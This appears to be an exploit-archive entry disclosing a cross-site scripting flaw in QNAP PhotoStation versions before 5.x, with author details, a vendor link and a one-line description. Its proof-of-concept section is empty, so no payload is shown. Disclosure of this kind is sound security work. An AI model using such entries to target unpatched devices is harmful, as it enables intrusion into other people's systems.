QNAP PhotoStation Cross Site Scripting

QNAP PhotoStation versions prior to 5.x suffer from a cross site scripting vulnerability.

MD5 | 05f5de9d0cbcfeb0b09d981b2c4c7cc6

# Exploit QNAP PhotoStation < 5.x Cross-Site Scripting 
# Date: 5/22/2018
# Exploit Author: SaeedReza Zamanian
# Software Link: https://www.qnap.com/en/app_center/con_show.php?op=showone&internalName=PhotoStation&version=5.7.0&down_1_name=TS-251&jump_win=1&qts=4.3.4&seq=120
# Vendor Home Page: https://www.qnap.com
# Tested On: Unix
# Contact: https://www.linkedin.com/in/penetrationtest/

1. Description

Parameter Validation is not implemented correctly in this applicaton, so attackers can implement XSS attack on this webapp.

2. Proof of Concept


Related Posts